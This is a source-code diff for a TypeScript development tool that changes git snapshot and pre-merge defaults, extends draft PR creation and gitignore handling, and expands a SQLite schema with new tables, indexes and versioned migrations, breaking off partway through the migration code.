@@ -600,18 +719,14 @@ export class GitServiceImpl {
     return nativeGetCurrentBranch(this.basePath);
   }
 
-  /** True if currently on a GSD slice branch. */
-  // ─── Branch Lifecycle ──────────────────────────────────────────────────
-
-  // ─── S05 Features ─────────────────────────────────────────────────────
-
   /**
    * Create a snapshot ref for the given label (typically a slice branch name).
-   * Gated on prefs.snapshots === true. Ref path: refs/gsd/snapshots/<label>/<timestamp>
+   * Enabled by default; opt out with prefs.snapshots === false.
+   * Ref path: refs/gsd/snapshots/<label>/<timestamp>
    * The ref points at HEAD, capturing the current commit before destructive operations.
    */
   createSnapshot(label: string): void {
-    if (this.prefs.snapshots !== true) return;
+    if (this.prefs.snapshots === false) return;
 
     const now = new Date();
     const ts = now.getFullYear().toString()
@@ -633,7 +748,7 @@ export class GitServiceImpl {
    * Stub: to be implemented in T03.
    */
   runPreMergeCheck(): PreMergeCheckResult {
-    if (this.prefs.pre_merge_check === false || this.prefs.pre_merge_check === undefined) {
+    if (this.prefs.pre_merge_check === false) {
       return { passed: true, skipped: true };
     }
 
@@ -665,8 +780,6 @@ export class GitServiceImpl {
     }
   }
 
-  // ─── Merge ─────────────────────────────────────────────────────────────
-
 }
 
 // ─── Draft PR Creation ─────────────────────────────────────────────────────
@@ -681,13 +794,17 @@ export function createDraftPR(
   milestoneId: string,
   title: string,
   body: string,
+  opts?: { head?: string; base?: string },
 ): string | null {
   try {
-    const result = execFileSync("gh", [
+    const args = [
       "pr", "create", "--draft",
       "--title", title,
       "--body", body,
-    ], { cwd: basePath, encoding: "utf8", timeout: 30000, env: GIT_NO_PROMPT_ENV });
+    ];
+    if (opts?.head) args.push("--head", opts.head);
+    if (opts?.base) args.push("--base", opts.base);
+    const result = execFileSync("gh", args, { cwd: basePath, encoding: "utf8", timeout: 30000, env: GIT_NO_PROMPT_ENV });
     return result.trim();
   } catch {
     return null;
diff --git a/src/resources/extensions/gsd/gitignore.ts b/src/resources/extensions/gsd/gitignore.ts
index cb65f8c00..8a80c3da5 100644
--- a/src/resources/extensions/gsd/gitignore.ts
+++ b/src/resources/extensions/gsd/gitignore.ts
@@ -1,8 +1,8 @@
 /**
- * GSD bootstrappers for .gitignore and preferences.md
+ * GSD bootstrappers for .gitignore and PREFERENCES.md
  *
  * Ensures baseline .gitignore exists with universally-correct patterns.
- * Creates an empty preferences.md template if it doesn't exist.
+ * Creates an empty PREFERENCES.md template if it doesn't exist.
  * Both idempotent — non-destructive if already present.
  */
 
@@ -29,6 +29,10 @@ const GSD_RUNTIME_PATTERNS = [
   ".gsd/completed-units.json",
   ".gsd/STATE.md",
   ".gsd/gsd.db",
+  ".gsd/gsd.db-shm",   // SQLite WAL sidecar — always created alongside gsd.db (#2296)
+  ".gsd/gsd.db-wal",   // SQLite WAL sidecar — always created alongside gsd.db (#2296)
+  ".gsd/journal/",     // daily-rotated JSONL event journal (#2296)
+  ".gsd/doctor-history.jsonl", // doctor run history (#2296)
   ".gsd/DISCUSSION-MANIFEST.json",
   ".gsd/milestones/**/*-CONTINUE.md",
   ".gsd/milestones/**/continue.md",
@@ -37,6 +41,8 @@ const GSD_RUNTIME_PATTERNS = [
 const BASELINE_PATTERNS = [
   // ── GSD state directory (symlink to external storage) ──
   ".gsd",
+  ".gsd-id",
+  ".bg-shell/",
 
   // ── OS junk ──
   ".DS_Store",
@@ -80,6 +86,38 @@ const BASELINE_PATTERNS = [
   "tmp/",
 ];
 
+/**
+ * Check whether `.gsd` is covered by the project's `.gitignore`.
+ *
+ * Uses `git check-ignore` for accurate evaluation — this respects nested
+ * .gitignore files, global gitignore, and negation patterns. Returns true
+ * only when git would actually ignore `.gsd/`.
+ *
+ * Returns false (not ignored) if:
+ *   - No `.gitignore` exists
+ *   - `.gsd` is not listed in any active ignore rule
+ *   - Not a git repo or git is unavailable
+ */
+export function isGsdGitignored(basePath: string): boolean {
+  // Check both `.gsd` and `.gsd/` because `.gsd/` in .gitignore (trailing
+  // slash = directory-only pattern) only matches the directory form. Using
+  // both paths covers all gitignore pattern variants.
+  for (const path of [".gsd", ".gsd/"]) {
+    try {
+      // git check-ignore exits 0 when the path IS ignored, 1 when it is NOT.
+      execFileSync("git", ["check-ignore", "-q", path], {
+        cwd: basePath,
+        stdio: "pipe",
+        env: GIT_NO_PROMPT_ENV,
+      });
+      return true; // exit 0 → .gsd is ignored
+    } catch {
+      // exit 1 → this form is NOT ignored, try the other
+    }
+  }
+  return false; // neither form is ignored (or git unavailable)
+}
+
 /**
  * Check whether `.gsd/` contains files tracked by git.
  * If so, the project intentionally keeps `.gsd/` in version control
@@ -137,7 +175,7 @@ export function hasGitTrackedGsdFiles(basePath: string): boolean {
  */
 export function ensureGitignore(
   basePath: string,
-  options?: { manageGitignore?: boolean; commitDocs?: boolean },
+  options?: { manageGitignore?: boolean },
 ): boolean {
   // If manage_gitignore is explicitly false, do not touch .gitignore at all
   if (options?.manageGitignore === false) return false;
@@ -212,16 +250,16 @@ export function untrackRuntimeFiles(basePath: string): void {
 }
 
 /**
- * Ensure basePath/.gsd/preferences.md exists as an empty template.
+ * Ensure basePath/.gsd/PREFERENCES.md exists as an empty template.
  * Creates the file with frontmatter only if it doesn't exist.
  * Returns true if created, false if already exists.
  *
- * Checks both lowercase (canonical) and uppercase (legacy) to avoid
- * creating a duplicate when an uppercase file already exists.
+ * Checks both uppercase (canonical) and lowercase (legacy) to avoid
+ * creating a duplicate when a lowercase file already exists.
  */
 export function ensurePreferences(basePath: string): boolean {
-  const preferencesPath = join(gsdRoot(basePath), "preferences.md");
-  const legacyPath = join(gsdRoot(basePath), "PREFERENCES.md");
+  const preferencesPath = join(gsdRoot(basePath), "PREFERENCES.md");
+  const legacyPath = join(gsdRoot(basePath), "preferences.md");
 
   if (existsSync(preferencesPath) || existsSync(legacyPath)) {
     return false;
diff --git a/src/resources/extensions/gsd/gsd-db.ts b/src/resources/extensions/gsd/gsd-db.ts
index bcd8c52b3..b25b820f9 100644
--- a/src/resources/extensions/gsd/gsd-db.ts
+++ b/src/resources/extensions/gsd/gsd-db.ts
@@ -6,20 +6,14 @@
 // Schema is initialized on first open with WAL mode for file-backed DBs.
 
 import { createRequire } from "node:module";
-import { existsSync, copyFileSync, mkdirSync } from "node:fs";
+import { existsSync, copyFileSync, mkdirSync, realpathSync } from "node:fs";
 import { dirname } from "node:path";
-import type { Decision, Requirement } from "./types.js";
+import type { Decision, Requirement, GateRow, GateId, GateScope, GateStatus, GateVerdict } from "./types.js";
 import { GSDError, GSD_STALE_STATE } from "./errors.js";
+import { logError, logWarning } from "./workflow-logger.js";
 
-// Create a require function for loading native modules in ESM context
 const _require = createRequire(import.meta.url);
 
-// ─── Provider Abstraction ──────────────────────────────────────────────────
-
-/**
- * Minimal interface over both node:sqlite DatabaseSync and better-sqlite3 Database.
- * Both expose prepare().run/get/all — the adapter normalizes row objects.
- */
 interface DbStatement {
   run(...params: unknown[]): unknown;
   get(...params: unknown[]): Record<string, unknown> | undefined;
@@ -38,13 +32,9 @@ let providerName: ProviderName | null = null;
 let providerModule: unknown = null;
 let loadAttempted = false;
 
-/**
- * Suppress the ExperimentalWarning for SQLite from node:sqlite.
- * Must be called before require('node:sqlite').
- */
 function suppressSqliteWarning(): void {
   const origEmit = process.emit;
-  // @ts-expect-error — overriding process.emit with filtered version
+  // @ts-expect-error overriding process.emit for warning filter
   process.emit = function (event: string, ...args: unknown[]): boolean {
     if (
       event === "warning" &&
@@ -58,9 +48,7 @@ function suppressSqliteWarning(): void {
     ) {
       return false;
     }
-    return origEmit.apply(process, [event, ...args] as Parameters<
-      typeof process.emit
-    >) as unknown as boolean;
+    return origEmit.apply(process, [event, ...args] as Parameters<typeof process.emit>) as unknown as boolean;
   };
 }
 
@@ -68,7 +56,6 @@ function loadProvider(): void {
   if (loadAttempted) return;
   loadAttempted = true;
 
-  // Try node:sqlite first
   try {
     suppressSqliteWarning();
     const mod = _require("node:sqlite");
@@ -78,10 +65,9 @@ function loadProvider(): void {
       return;
     }
   } catch {
-    // node:sqlite not available
+    // unavailable
   }
 
-  // Try better-sqlite3
   try {
     const mod = _require("better-sqlite3");
     if (typeof mod === "function" || (mod && mod.default)) {
@@ -90,19 +76,18 @@ function loadProvider(): void {
       return;
     }
   } catch {
-    // better-sqlite3 not available
+    // unavailable
   }
 
+  const nodeMajor = parseInt(process.versions.node.split(".")[0], 10);
+  const versionHint = nodeMajor < 22
+    ? ` GSD requires Node >= 22.0.0 (current: v${process.versions.node}). Upgrade Node to fix this.`
+    : "";
   process.stderr.write(
-    "gsd-db: No SQLite provider available (tried node:sqlite, better-sqlite3)\n",
+    `gsd-db: No SQLite provider available (tried node:sqlite, better-sqlite3).${versionHint}\n`,
   );
 }
 
-// ─── Database Adapter ──────────────────────────────────────────────────────
-
-/**
- * Normalize a row from node:sqlite (null-prototype) to a plain object.
- */
 function normalizeRow(row: unknown): Record<string, unknown> | undefined {
   if (row == null) return undefined;
   if (Object.getPrototypeOf(row) === null) {
@@ -126,25 +111,35 @@ function createAdapter(rawDb: unknown): DbAdapter {
     close(): void;
   };
 
+  const stmtCache = new Map<string, DbStatement>();
+
+  function wrapStmt(raw: { run(...a: unknown[]): unknown; get(...a: unknown[]): unknown; all(...a: unknown[]): unknown[] }): DbStatement {
+    return {
+      run(...params: unknown[]): unknown {
+        return raw.run(...params);
+      },
+      get(...params: unknown[]): Record<string, unknown> | undefined {
+        return normalizeRow(raw.get(...params));
+      },
+      all(...params: unknown[]): Record<string, unknown>[] {
+        return normalizeRows(raw.all(...params));
+      },
+    };
+  }
+
   return {
     exec(sql: string): void {
       db.exec(sql);
     },
     prepare(sql: string): DbStatement {
-      const stmt = db.prepare(sql);
-      return {
-        run(...params: unknown[]): unknown {
-          return stmt.run(...params);
-        },
-        get(...params: unknown[]): Record<string, unknown> | undefined {
-          return normalizeRow(stmt.get(...params));
-        },
-        all(...params: unknown[]): Record<string, unknown>[] {
-          return normalizeRows(stmt.all(...params));
-        },
-      };
+      let cached = stmtCache.get(sql);
+      if (cached) return cached;
+      cached = wrapStmt(db.prepare(sql));
+      stmtCache.set(sql, cached);
+      return cached;
     },
     close(): void {
+      stmtCache.clear();
       db.close();
     },
   };
@@ -161,20 +156,21 @@ function openRawDb(path: string): unknown {
     return new DatabaseSync(path);
   }
 
-  // better-sqlite3
   const Database = providerModule as new (path: string) => unknown;
   return new Database(path);
 }
 
-// ─── Schema ────────────────────────────────────────────────────────────────
-
-const SCHEMA_VERSION = 4;
+const SCHEMA_VERSION = 14;
 
 function initSchema(db: DbAdapter, fileBacked: boolean): void {
-  // WAL mode for file-backed databases (must be outside transaction)
-  if (fileBacked) {
-    db.exec("PRAGMA journal_mode=WAL");
-  }
+  if (fileBacked) db.exec("PRAGMA journal_mode=WAL");
+  if (fileBacked) db.exec("PRAGMA busy_timeout = 5000");
+  if (fileBacked) db.exec("PRAGMA synchronous = NORMAL");
+  if (fileBacked) db.exec("PRAGMA auto_vacuum = INCREMENTAL");
+  if (fileBacked) db.exec("PRAGMA cache_size = -8000");   // 8 MB page cache
+  if (fileBacked) db.exec("PRAGMA mmap_size = 67108864");  // 64 MB mmap
+  db.exec("PRAGMA temp_store = MEMORY");
+  db.exec("PRAGMA foreign_keys = ON");
 
   db.exec("BEGIN");
   try {
@@ -253,25 +249,176 @@ function initSchema(db: DbAdapter, fileBacked: boolean): void {
       )
     `);
 
-    db.exec(
-      "CREATE INDEX IF NOT EXISTS idx_memories_active ON memories(superseded_by)",
-    );
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS milestones (
+        id TEXT PRIMARY KEY,
+        title TEXT NOT NULL DEFAULT '',
+        status TEXT NOT NULL DEFAULT 'active',
+        depends_on TEXT NOT NULL DEFAULT '[]',
+        created_at TEXT NOT NULL DEFAULT '',
+        completed_at TEXT DEFAULT NULL,
+        vision TEXT NOT NULL DEFAULT '',
+        success_criteria TEXT NOT NULL DEFAULT '[]',
+        key_risks TEXT NOT NULL DEFAULT '[]',
+        proof_strategy TEXT NOT NULL DEFAULT '[]',
+        verification_contract TEXT NOT NULL DEFAULT '',
+        verification_integration TEXT NOT NULL DEFAULT '',
+        verification_operational TEXT NOT NULL DEFAULT '',
+        verification_uat TEXT NOT NULL DEFAULT '',
+        definition_of_done TEXT NOT NULL DEFAULT '[]',
+        requirement_coverage TEXT NOT NULL DEFAULT '',
+        boundary_map_markdown TEXT NOT NULL DEFAULT ''
+      )
+    `);
 
-    // Views — DROP + CREATE since CREATE VIEW IF NOT EXISTS doesn't update definitions
-    db.exec(
-      `CREATE VIEW IF NOT EXISTS active_decisions AS SELECT * FROM decisions WHERE superseded_by IS NULL`,
-    );
-    db.exec(
-      `CREATE VIEW IF NOT EXISTS active_requirements AS SELECT * FROM requirements WHERE superseded_by IS NULL`,
-    );
-    db.exec(
-      `CREATE VIEW IF NOT EXISTS active_memories AS SELECT * FROM memories WHERE superseded_by IS NULL`,
-    );
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS slices (
+        milestone_id TEXT NOT NULL,
+        id TEXT NOT NULL,
+        title TEXT NOT NULL DEFAULT '',
+        status TEXT NOT NULL DEFAULT 'pending',
+        risk TEXT NOT NULL DEFAULT 'medium',
+        depends TEXT NOT NULL DEFAULT '[]',
+        demo TEXT NOT NULL DEFAULT '',
+        created_at TEXT NOT NULL DEFAULT '',
+        completed_at TEXT DEFAULT NULL,
+        full_summary_md TEXT NOT NULL DEFAULT '',
+        full_uat_md TEXT NOT NULL DEFAULT '',
+        goal TEXT NOT NULL DEFAULT '',
+        success_criteria TEXT NOT NULL DEFAULT '',
+        proof_level TEXT NOT NULL DEFAULT '',
+        integration_closure TEXT NOT NULL DEFAULT '',
+        observability_impact TEXT NOT NULL DEFAULT '',
+        sequence INTEGER DEFAULT 0, -- Ordering hint: tools may set this to control execution order
+        replan_triggered_at TEXT DEFAULT NULL,
+        PRIMARY KEY (milestone_id, id),
+        FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+      )
+    `);
 
-    // Insert schema version if not already present
-    const existing = db
-      .prepare("SELECT count(*) as cnt FROM schema_version")
-      .get();
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS tasks (
+        milestone_id TEXT NOT NULL,
+        slice_id TEXT NOT NULL,
+        id TEXT NOT NULL,
+        title TEXT NOT NULL DEFAULT '',
+        status TEXT NOT NULL DEFAULT 'pending',
+        one_liner TEXT NOT NULL DEFAULT '',
+        narrative TEXT NOT NULL DEFAULT '',
+        verification_result TEXT NOT NULL DEFAULT '',
+        duration TEXT NOT NULL DEFAULT '',
+        completed_at TEXT DEFAULT NULL,
+        blocker_discovered INTEGER DEFAULT 0,
+        deviations TEXT NOT NULL DEFAULT '',
+        known_issues TEXT NOT NULL DEFAULT '',
+        key_files TEXT NOT NULL DEFAULT '[]',
+        key_decisions TEXT NOT NULL DEFAULT '[]',
+        full_summary_md TEXT NOT NULL DEFAULT '',
+        description TEXT NOT NULL DEFAULT '',
+        estimate TEXT NOT NULL DEFAULT '',
+        files TEXT NOT NULL DEFAULT '[]',
+        verify TEXT NOT NULL DEFAULT '',
+        inputs TEXT NOT NULL DEFAULT '[]',
+        expected_output TEXT NOT NULL DEFAULT '[]',
+        observability_impact TEXT NOT NULL DEFAULT '',
+        full_plan_md TEXT NOT NULL DEFAULT '',
+        sequence INTEGER DEFAULT 0, -- Ordering hint: tools may set this to control execution order
+        PRIMARY KEY (milestone_id, slice_id, id),
+        FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id)
+      )
+    `);
+
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS verification_evidence (
+        id INTEGER PRIMARY KEY AUTOINCREMENT,
+        task_id TEXT NOT NULL DEFAULT '',
+        slice_id TEXT NOT NULL DEFAULT '',
+        milestone_id TEXT NOT NULL DEFAULT '',
+        command TEXT NOT NULL DEFAULT '',
+        exit_code INTEGER DEFAULT 0,
+        verdict TEXT NOT NULL DEFAULT '',
+        duration_ms INTEGER DEFAULT 0,
+        created_at TEXT NOT NULL DEFAULT '',
+        FOREIGN KEY (milestone_id, slice_id, task_id) REFERENCES tasks(milestone_id, slice_id, id)
+      )
+    `);
+
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS replan_history (
+        id INTEGER PRIMARY KEY AUTOINCREMENT,
+        milestone_id TEXT NOT NULL DEFAULT '',
+        slice_id TEXT DEFAULT NULL,
+        task_id TEXT DEFAULT NULL,
+        summary TEXT NOT NULL DEFAULT '',
+        previous_artifact_path TEXT DEFAULT NULL,
+        replacement_artifact_path TEXT DEFAULT NULL,
+        created_at TEXT NOT NULL DEFAULT '',
+        FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+      )
+    `);
+
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS assessments (
+        path TEXT PRIMARY KEY,
+        milestone_id TEXT NOT NULL DEFAULT '',
+        slice_id TEXT DEFAULT NULL,
+        task_id TEXT DEFAULT NULL,
+        status TEXT NOT NULL DEFAULT '',
+        scope TEXT NOT NULL DEFAULT '',
+        full_content TEXT NOT NULL DEFAULT '',
+        created_at TEXT NOT NULL DEFAULT '',
+        FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+      )
+    `);
+
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS quality_gates (
+        milestone_id TEXT NOT NULL,
+        slice_id TEXT NOT NULL,
+        gate_id TEXT NOT NULL,
+        scope TEXT NOT NULL DEFAULT 'slice',
+        task_id TEXT NOT NULL DEFAULT '',
+        status TEXT NOT NULL DEFAULT 'pending',
+        verdict TEXT NOT NULL DEFAULT '',
+        rationale TEXT NOT NULL DEFAULT '',
+        findings TEXT NOT NULL DEFAULT '',
+        evaluated_at TEXT DEFAULT NULL,
+        PRIMARY KEY (milestone_id, slice_id, gate_id, task_id),
+        FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id)
+      )
+    `);
+
+    // Slice dependency junction table (v14)
+    db.exec(`
+      CREATE TABLE IF NOT EXISTS slice_dependencies (
+        milestone_id TEXT NOT NULL,
+        slice_id TEXT NOT NULL,
+        depends_on_slice_id TEXT NOT NULL,
+        PRIMARY KEY (milestone_id, slice_id, depends_on_slice_id),
+        FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id),
+        FOREIGN KEY (milestone_id, depends_on_slice_id) REFERENCES slices(milestone_id, id)
+      )
+    `);
+
+    db.exec("CREATE INDEX IF NOT EXISTS idx_memories_active ON memories(superseded_by)");
+    db.exec("CREATE INDEX IF NOT EXISTS idx_replan_history_milestone ON replan_history(milestone_id, created_at)");
+
+    // v13 indexes — hot-path dispatch queries
+    db.exec("CREATE INDEX IF NOT EXISTS idx_tasks_active ON tasks(milestone_id, slice_id, status)");
+    db.exec("CREATE INDEX IF NOT EXISTS idx_slices_active ON slices(milestone_id, status)");
+    db.exec("CREATE INDEX IF NOT EXISTS idx_milestones_status ON milestones(status)");
+    db.exec("CREATE INDEX IF NOT EXISTS idx_quality_gates_pending ON quality_gates(milestone_id, slice_id, status)");
+    db.exec("CREATE INDEX IF NOT EXISTS idx_verification_evidence_task ON verification_evidence(milestone_id, slice_id, task_id)");
+    db.exec("CREATE UNIQUE INDEX IF NOT EXISTS idx_verification_evidence_dedup ON verification_evidence(task_id, slice_id, milestone_id, command, verdict)");
+
+    // v14 index — slice dependency lookups
+    db.exec("CREATE INDEX IF NOT EXISTS idx_slice_deps_target ON slice_dependencies(milestone_id, depends_on_slice_id)");
+
+    db.exec(`CREATE VIEW IF NOT EXISTS active_decisions AS SELECT * FROM decisions WHERE superseded_by IS NULL`);
+    db.exec(`CREATE VIEW IF NOT EXISTS active_requirements AS SELECT * FROM requirements WHERE superseded_by IS NULL`);
+    db.exec(`CREATE VIEW IF NOT EXISTS active_memories AS SELECT * FROM memories WHERE superseded_by IS NULL`);
+
+    const existing = db.prepare("SELECT count(*) as cnt FROM schema_version").get();
     if (existing && (existing["cnt"] as number) === 0) {
       db.prepare(
         "INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)",
@@ -287,23 +434,44 @@ function initSchema(db: DbAdapter, fileBacked: boolean): void {
     throw err;
   }
 
-  // Run incremental migrations for existing databases
   migrateSchema(db);
 }
 
-/**
- * Incremental schema migration. Reads current version from schema_version table
- * and applies DDL for each version step up to SCHEMA_VERSION.
- */
+function columnExists(db: DbAdapter, table: string, column: string): boolean {
+  const rows = db.prepare(`PRAGMA table_info(${table})`).all();
+  return rows.some((row) => row["name"] === column);
+}
+
+function ensureColumn(db: DbAdapter, table: string, column: string, ddl: string): void {
+  if (!columnExists(db, table, column)) db.exec(ddl);
+}
+
 function migrateSchema(db: DbAdapter): void {
   const row = db.prepare("SELECT MAX(version) as v FROM schema_version").get();
   const currentVersion = row ? (row["v"] as number) : 0;
-
   if (currentVersion >= SCHEMA_VERSION) return;
 
+  // Backup database before migration so a mid-migration crash doesn't
+  // leave a partially-migrated DB with no recovery path.
+  // WAL-safe: checkpoint first to flush WAL into the main DB file, then copy.
+  if (currentPath && currentPath !== ":memory:" && existsSync(currentPath)) {
+    try {
+      const backupPath = `${currentPath}.backup-v${currentVersion}`;
+      if (!existsSync(backupPath)) {
+        // Flush WAL to main DB file before copying — without this, the backup
+        // may be missing committed data that only exists in the -wal file.
+        try { db.exec("PRAGMA wal_checkpoint(TRUNCATE)"); } catch { /* checkpoint is best-effort */ }
+        copyFileSync(currentPath, backupPath);
+      }
+    } catch (backupErr) {
+      // Log but proceed — blocking migration leaves the DB stuck at an old
+      // schema version permanently on read-only or full filesystems.
+      logWarning("db", `Pre-migration backup failed: ${backupErr instanceof Error ? backupErr.message : String(backupErr)}`);
+    }
+  }
+
   db.exec("BEGIN");
   try {
-    // v1 → v2: add artifacts table
     if (currentVersion < 2) {
       db.exec(`
         CREATE TABLE IF NOT EXISTS artifacts (
@@ -316,13 +484,12 @@ function migrateSchema(db: DbAdapter): void {
           imported_at TEXT NOT NULL DEFAULT ''
         )
       `);
-
-      db.prepare(
-        "INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)",
-      ).run({ ":version": 2, ":applied_at": new Date().toISOString() });
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 2,
+        ":applied_at": new Date().toISOString(),
+      });
     }
 
-    // v2 → v3: add memories + memory_processed_units tables
     if (currentVersion < 3) {
       db.exec(`
         CREATE TABLE IF NOT EXISTS memories (
@@ -339,7 +506,6 @@ function migrateSchema(db: DbAdapter): void {
           hit_count INTEGER NOT NULL DEFAULT 0
         )
       `);
-
       db.exec(`
         CREATE TABLE IF NOT EXISTS memory_processed_units (
           unit_key TEXT PRIMARY KEY,
@@ -347,34 +513,258 @@ function migrateSchema(db: DbAdapter): void {
           processed_at TEXT NOT NULL
         )
       `);
-
-      db.exec(
-        "CREATE INDEX IF NOT EXISTS idx_memories_active ON memories(superseded_by)",
-      );
+      db.exec("CREATE INDEX IF NOT EXISTS idx_memories_active ON memories(superseded_by)");
       db.exec("DROP VIEW IF EXISTS active_memories");
-      db.exec(
-        "CREATE VIEW active_memories AS SELECT * FROM memories WHERE superseded_by IS NULL",
-      );
-
-      db.prepare(
-        "INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)",
-      ).run({ ":version": 3, ":applied_at": new Date().toISOString() });
+      db.exec("CREATE VIEW active_memories AS SELECT * FROM memories WHERE superseded_by IS NULL");
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 3,
+        ":applied_at": new Date().toISOString(),
+      });
     }
 
-    // v3 → v4: add made_by column to decisions table
     if (currentVersion < 4) {
-      // Add made_by column — default 'agent' for existing rows (pre-attribution decisions)
-      db.exec(`ALTER TABLE decisions ADD COLUMN made_by TEXT NOT NULL DEFAULT 'agent'`);
-
-      // Recreate views to pick up new columns (SQLite expands SELECT * at view creation time)
+      ensureColumn(db, "decisions", "made_by", `ALTER TABLE decisions ADD COLUMN made_by TEXT NOT NULL DEFAULT 'agent'`);
       db.exec("DROP VIEW IF EXISTS active_decisions");
-      db.exec(
-        "CREATE VIEW active_decisions AS SELECT * FROM decisions WHERE superseded_by IS NULL",
-      );
+      db.exec("CREATE VIEW active_decisions AS SELECT * FROM decisions WHERE superseded_by IS NULL");
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 4,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
 
-      db.prepare(
-        "INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)",
-      ).run({ ":version": 4, ":applied_at": new Date().toISOString() });
+    if (currentVersion < 5) {
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS milestones (
+          id TEXT PRIMARY KEY,
+          title TEXT NOT NULL DEFAULT '',
+          status TEXT NOT NULL DEFAULT 'active',
+          created_at TEXT NOT NULL,
+          completed_at TEXT DEFAULT NULL
+        )
+      `);
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS slices (
+          milestone_id TEXT NOT NULL,
+          id TEXT NOT NULL,
+          title TEXT NOT NULL DEFAULT '',
+          status TEXT NOT NULL DEFAULT 'pending',
+          risk TEXT NOT NULL DEFAULT 'medium',
+          created_at TEXT NOT NULL DEFAULT '',
+          completed_at TEXT DEFAULT NULL,
+          PRIMARY KEY (milestone_id, id),
+          FOREIGN KEY (milestone_id) REFERENCES milestones(id)
+        )
+      `);
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS tasks (
+          milestone_id TEXT NOT NULL,
+          slice_id TEXT NOT NULL,
+          id TEXT NOT NULL,
+          title TEXT NOT NULL DEFAULT '',
+          status TEXT NOT NULL DEFAULT 'pending',
+          one_liner TEXT NOT NULL DEFAULT '',
+          narrative TEXT NOT NULL DEFAULT '',
+          verification_result TEXT NOT NULL DEFAULT '',
+          duration TEXT NOT NULL DEFAULT '',
+          completed_at TEXT DEFAULT NULL,
+          blocker_discovered INTEGER DEFAULT 0,
+          deviations TEXT NOT NULL DEFAULT '',
+          known_issues TEXT NOT NULL DEFAULT '',
+          key_files TEXT NOT NULL DEFAULT '[]',
+          key_decisions TEXT NOT NULL DEFAULT '[]',
+          full_summary_md TEXT NOT NULL DEFAULT '',
+          PRIMARY KEY (milestone_id, slice_id, id),
+          FOREIGN KEY (milestone_id, slice_id) REFERENCES slices(milestone_id, id)
+        )
+      `);
+      db.exec(`
+        CREATE TABLE IF NOT EXISTS verification_evidence (
+          id INTEGER PRIMARY KEY AUTOINCREMENT,
+          task_id TEXT NOT NULL DEFAULT '',
+          slice_id TEXT NOT NULL DEFAULT '',
+          milestone_id TEXT NOT NULL DEFAULT '',
+          command TEXT NOT NULL DEFAULT '',
+          exit_code INTEGER DEFAULT 0,
+          verdict TEXT NOT NULL DEFAULT '',
+          duration_ms INTEGER DEFAULT 0,
+          created_at TEXT NOT NULL DEFAULT '',
+          FOREIGN KEY (milestone_id, slice_id, task_id) REFERENCES tasks(milestone_id, slice_id, id)
+        )
+      `);
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 5,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 6) {
+      ensureColumn(db, "slices", "full_summary_md", `ALTER TABLE slices ADD COLUMN full_summary_md TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "slices", "full_uat_md", `ALTER TABLE slices ADD COLUMN full_uat_md TEXT NOT NULL DEFAULT ''`);
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 6,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 7) {
+      ensureColumn(db, "slices", "depends", `ALTER TABLE slices ADD COLUMN depends TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "slices", "demo", `ALTER TABLE slices ADD COLUMN demo TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "depends_on", `ALTER TABLE milestones ADD COLUMN depends_on TEXT NOT NULL DEFAULT '[]'`);
+      db.prepare("INSERT INTO schema_version (version, applied_at) VALUES (:version, :applied_at)").run({
+        ":version": 7,
+        ":applied_at": new Date().toISOString(),
+      });
+    }
+
+    if (currentVersion < 8) {
+      ensureColumn(db, "milestones", "vision", `ALTER TABLE milestones ADD COLUMN vision TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "success_criteria", `ALTER TABLE milestones ADD COLUMN success_criteria TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "milestones", "key_risks", `ALTER TABLE milestones ADD COLUMN key_risks TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "milestones", "proof_strategy", `ALTER TABLE milestones ADD COLUMN proof_strategy TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "milestones", "verification_contract", `ALTER TABLE milestones ADD COLUMN verification_contract TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "verification_integration", `ALTER TABLE milestones ADD COLUMN verification_integration TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "verification_operational", `ALTER TABLE milestones ADD COLUMN verification_operational TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "verification_uat", `ALTER TABLE milestones ADD COLUMN verification_uat TEXT NOT NULL DEFAULT ''`);
+      ensureColumn(db, "milestones", "definition_of_done", `ALTER TABLE milestones ADD COLUMN definition_of_done TEXT NOT NULL DEFAULT '[]'`);
+      ensureColumn(db, "milestones", "requirement_coverage", `ALTER TABLE milestones ADD COLUMN requirement_coverage TEXT NOT NULL DEFAULT ''`);
